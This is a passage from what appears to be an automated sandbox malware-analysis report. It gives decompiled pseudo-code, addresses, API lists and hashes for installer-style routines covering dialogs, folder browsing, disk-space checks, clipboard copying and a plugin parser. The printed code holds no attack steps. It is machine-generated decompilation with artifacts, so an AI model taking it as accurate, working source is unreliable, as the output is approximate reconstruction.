				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a238 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x004056b0
0x004056b6
0x004056c0
0x004056c3
0x00405859
0x00405876
0x0040587d
0x0040587d
0x00405890
0x004058ae
0x004058b0
0x004058b8
0x0040590e
0x00405912
0x00000000
0x00000000
0x00405914
0x0040591a
0x00000000
0x00000000
0x00405924
0x0040592c
0x0040592f
0x00405a31
0x00000000
0x00405a31
0x0040593e
0x00405949
0x00405952
0x0040595d
0x00405960
0x00405969
0x0040596f
0x00405972
0x00405972
0x0040598a
0x00405993
0x00405996
0x0040599d
0x004059a4
0x004059ac
0x004059ac
0x004059c3
0x004059c3
0x004059ca
0x004059d0
0x004059dc
0x004059e3
0x004059ec
0x004059ee
0x004059f1
0x00405a00
0x00405a03
0x00405a09
0x00405a0a
0x00405a10
0x00405a11
0x00405a12
0x00405a1a
0x00405a25
0x00405a2b
0x00405a2b
0x00000000
0x0040598a
0x004058c0
0x004058f0
0x004058f8
0x004058fa
0x00405903
0x00405903
0x00405909
0x00000000
0x00405909
0x004058c4
0x004058ce
0x00000000
0x00405892
0x00405898
0x004058d3
0x00000000
0x004058dc
0x004058a1
0x004058a6
0x004058a9
0x00000000
0x004058a9
0x00405890
0x004056c9
0x004056cd
0x004056d5
0x004056d9
0x004056dc
0x004056df
0x004056e2
0x004056e5
0x004056e6
0x004056e7
0x00405700
0x00405703
0x0040570d
0x0040571c
0x00405724
0x0040572c
0x00405731
0x00405734
0x00405740
0x00405749
0x00405752
0x00405774
0x0040577a
0x0040578b
0x00405790
0x0040579e
0x004057ac
0x004057ac
0x004057b1
0x004057bf
0x004057bf
0x004057c4
0x004057c7
0x004057cc
0x004057d8
0x004057e1
0x004057ee
0x004057fd
0x004057f0
0x004057f5
0x004057f5
0x00405809
0x00405809
0x0040581d
0x00405826
0x0040582f
0x0040583f
0x0040584b
0x0040584b
0x00000000

APIs

GetDlgItem.USER32 ref: 00405706
GetDlgItem.USER32 ref: 00405715
GetClientRect.USER32(?,?), ref: 00405752
GetSystemMetrics.USER32 ref: 00405759
SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
ShowWindow.USER32(?,00000008), ref: 004057F5
GetDlgItem.USER32 ref: 00405816
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
GetDlgItem.USER32 ref: 00405724

Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

GetDlgItem.USER32 ref: 00405868
CreateThread.KERNELBASE ref: 00405876
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040587D
ShowWindow.USER32(00000000), ref: 004058A1
ShowWindow.USER32(?,00000008), ref: 004058A6
ShowWindow.USER32(00000008), ref: 004058F0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
CreatePopupMenu.USER32 ref: 00405935
AppendMenuW.USER32 ref: 00405949
GetWindowRect.USER32 ref: 00405969
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
OpenClipboard.USER32(00000000), ref: 004059CA
EmptyClipboard.USER32 ref: 004059D0
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
GlobalLock.KERNEL32 ref: 004059E6
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
SetClipboardData.USER32 ref: 00405A25
CloseClipboard.USER32 ref: 00405A2B

Strings

{, xrefs: 0040590E

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: {
API String ID: 4154960007-366298937
Opcode ID: 165a3cd4051cb0ed5c4fcd35f2f77f5a32e68e104ce1385ff96711eca5f40e5a
Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
Opcode Fuzzy Hash: 165a3cd4051cb0ed5c4fcd35f2f77f5a32e68e104ce1385ff96711eca5f40e5a
Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00404954 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 275
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00404954(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				union _ULARGE_INTEGER _v28;
				intOrPtr _v32;
				long _v36;
				union _ULARGE_INTEGER _v40;
				unsigned int _v44;
				union _ULARGE_INTEGER _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				struct %anon54 _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				long _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x4226e0; // 0x80bc74
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B4B(0x3fb, _t146);
					E0040678E(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B4B(0x3fb, _t146);
							if(E00405EDE(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406507(0x4216d8, _t146);
							_t87 = E004068D4(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406507(0x4216d8, _t146);
								_t89 = E00405E81(0x4216d8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x4216d8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48.LowPart = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x4216d8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = GetDiskFreeSpaceExW(0x4216d8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E22(0x4216d8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x4216d8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48.LowPart = (_t150 << 0x00000020 | _v48.LowPart) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404DF1(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48.LowPart < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x4291fc + 0x10)) != _t158) {
									E00404DD9(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x4216c8);
									} else {
										E00404D10(_t169, 0xfffffffc, _v48.LowPart, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a2c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404485(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x4236f8 == _t158) {
									E004048AD();
								}
								 *0x4236f8 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423708;
							_v60 = E00404CAA;
							_v56 = _t146;
							_v68 = E00406544(_t146, 0x423708, _t167, 0x421ee0, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405DD6(_t146);
								_t125 =  *((intOrPtr*)( *0x42a230 + 0x11c));
								if( *((intOrPtr*)( *0x42a230 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
									E00406544(_t146, 0x423708, _t167, 0, _t125);
									if(lstrcmpiW(0x4281c0, 0x423708) != 0) {
										lstrcatW(_t146, 0x4281c0);
									}
								}
								 *0x4236f8 =  *0x4236f8 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E4D(_t146) != 0 && E00405E81(_t146) == 0) {
						E00405DD6(_t146);
					}
					 *0x4291f8 = _t167; // executed
					SetWindowTextW(_t166, _t146); // executed
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404463(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404463(_t167);
					E00404498(_t166);
					if(E004068D4(8) == 0) {
						L53:
						return E004044CA(_a8, _a12, _a16);
					} else {
						SHAutoComplete(_t166, 1); // executed
						goto L8;
					}
				}
			}

0x00404954
0x0040495a
0x00404960
0x0040496d
0x0040497b
0x0040497e
0x00404986
0x0040498c
0x0040498c
0x00404998
0x0040499b
0x00404a09
0x00404a10
0x00404ae7
0x00404aee
0x00404afd
0x00404afd
0x00404b01
0x00404b0b
0x00404b18
0x00404b1a
0x00404b1a
0x00404b28
0x00404b2f
0x00404b36
0x00404b39
0x00404b75
0x00404b77
0x00404b7d
0x00404b82
0x00404b86
0x00404b88
0x00404b88
0x00404ba4
0x00000000
0x00404ba6
0x00404ba9
0x00404bb7
0x00404bbd
0x00404bbe
0x00404bc1
0x00404bc4
0x00000000
0x00404bc4
0x00404b3b
0x00404b3d
0x00404b41
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b43
0x00404b43
0x00404b50
0x00404b55
0x00000000
0x00000000
0x00404b59
0x00404b5b
0x00404b5b
0x00404b64
0x00404b66
0x00404b6b
0x00404b6e
0x00404b73
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b73
0x00404bd0
0x00404bda
0x00404bdd
0x00404be0
0x00404be7
0x00404be7
0x00404be9
0x00404be9
0x00404bee
0x00404bf0
0x00404bf8
0x00404bff
0x00404c01
0x00404c0c
0x00404c0c
0x00404c01
0x00404c1c
0x00404c26
0x00404c2e
0x00404c49
0x00404c30
0x00404c39
0x00404c39
0x00404c2e
0x00404c4e
0x00404c53
0x00404c58
0x00404c61
0x00404c61
0x00404c6a
0x00404c6c
0x00404c6c
0x00404c78
0x00404c80
0x00404c8a
0x00404c8a
0x00404c8f
0x00000000
0x00404c8f
0x00404b39
0x00404af0
0x00404af7
0x00000000
0x00000000
0x00000000
0x00404af7
0x00404a16
0x00404a1f
0x00404a39
0x00404a3e
0x00404a48
0x00404a4f
0x00404a5b
0x00404a5e
0x00404a61
0x00404a68
0x00404a70
0x00404a73
0x00404a77
0x00404a7e
0x00404a86
0x00404ae0
0x00404a88
0x00404a89
0x00404a90
0x00404a9a
0x00404aa2
0x00404aaf
0x00404ac3
0x00404ac7
0x00404ac7
0x00404ac3
0x00404acc
0x00404ad9
0x00404ad9
0x00404a86
0x00000000
0x00404a3e
0x00404a2c
0x00000000
0x00000000
0x00404a32
0x00000000
0x0040499d
0x004049aa
0x004049b3
0x004049c0
0x004049c0
0x004049c7
0x004049cd
0x004049d6
0x004049d9
0x004049dc
0x004049e4
0x004049e7
0x004049ea
0x004049f0
0x004049fe
0x00404c95
0x00404ca7
0x00404a04
0x00404a07
0x00000000
0x00404a07
0x004049fe

APIs

GetDlgItem.USER32 ref: 004049A3
SetWindowTextW.USER32(00000000,?), ref: 004049CD
SHAutoComplete.SHLWAPI(00000000,00000001,00000008,00000000,?,00000014,?,?,00000001,?), ref: 00404A07
SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
CoTaskMemFree.OLE32(00000000), ref: 00404A89
lstrcmpiW.KERNEL32(Call,00423708,00000000,?,?), ref: 00404ABB
lstrcatW.KERNEL32(?,Call), ref: 00404AC7
SetDlgItemTextW.USER32 ref: 00404AD9

Part of subcall function 00405B4B: GetDlgItemTextW.USER32 ref: 00405B5E

Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
Part of subcall function 0040678E: CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
Part of subcall function 0040678E: CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818

GetDiskFreeSpaceExW.KERNELBASE(004216D8,?,?,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B50
GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7

Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
Part of subcall function 00404D10: SetDlgItemTextW.USER32 ref: 00404DCD

Strings

A, xrefs: 00404A77
C:\Users\user\AppData\Local\Temp, xrefs: 00404AA4
Call, xrefs: 00404AB5, 00404ABA, 00404AC5

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: CharItemText$FreeNext$DiskSpace$AutoBrowseCompleteFolderPrevTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$Call
API String ID: 4039761011-3265145871
Opcode ID: 48ad64a3fb01620437031791bd8cc3571db2214d75aa2af41fbbb2d007395b46
Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
Opcode Fuzzy Hash: 48ad64a3fb01620437031791bd8cc3571db2214d75aa2af41fbbb2d007395b46
Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 73331BFF Relevance: 20.1, APIs: 13, Instructions: 597
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E73331BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E733312BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E733312BB();
				_t321 = E733312E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t332 = GlobalAlloc(0x40, 0x1ca4);
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E733313B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E7333162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t261 - 0x3a;
									if(_t261 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t269 = _t260 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									L80:
									_t305 = _t286 + 0xffffffde;
									__eflags = _t305 - 0x55;
									if(_t305 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t305 + 0x733323e8) & 0x000000ff) * 4 +  &M7333235C))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												L131:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L136:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E733312CC(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __ax;
												if(__ax == 0) {
													goto L136;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E733312BB();
											 &_v12 = E73331B86( &_v12);
											__eax = E73331510(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E73331B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t271 =  *(_t332 + 0x1014);
											__eflags = _t271 - _v16;
											if(_t271 > _v16) {
												_v16 = _t271;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t271 - (_v36 == 3);
											if(_t271 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E73331B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x7333405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
